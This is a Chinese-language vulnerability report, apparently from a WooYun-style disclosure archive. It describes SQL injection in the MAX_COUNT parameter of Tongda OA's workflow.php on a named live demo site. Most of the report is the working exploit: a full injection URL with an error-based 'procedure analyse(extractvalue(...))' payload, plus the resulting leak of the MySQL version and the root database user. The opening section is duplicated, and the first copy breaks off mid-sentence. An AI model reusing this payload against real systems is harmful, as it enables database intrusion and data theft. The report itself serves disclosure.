VULHUB ™

### 简要描述： 又是通达 ### 详细说明： 官网demo登录试用: http://www.day900.com 注入点: http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random 加单引号后: 请联系管理员 错误#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15\' 文件：/general/mytable/intel_view/workflow.php 注入点在max_count,但是在limit处，好几次都不成功 终于： 上payload: 15 procedure...

### 简要描述： 又是通达 ### 详细说明： 官网demo登录试用: http://www.day900.com 注入点: http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random 加单引号后: 请联系管理员 错误#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15\' 文件：/general/mytable/intel_view/workflow.php 注入点在max_count,但是在limit处，好几次都不成功 终于： 上payload: 15 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random 成功返回version: 错误#1105: XPATH syntax error: ':5.5.25-enterprise-commercial-ad' SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1) 文件：/general/mytable/intel_view/workflow.php 同样也可以返回user 错误#1105: XPATH syntax error: ':root@127.0.0.1' SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15 procedure analyse(extractvalue(rand(),concat(0x3a,user())),1) 文件：/general/mytable/intel_view/workflow.php root@127.0.0.1 ### 漏洞证明： 见详细说明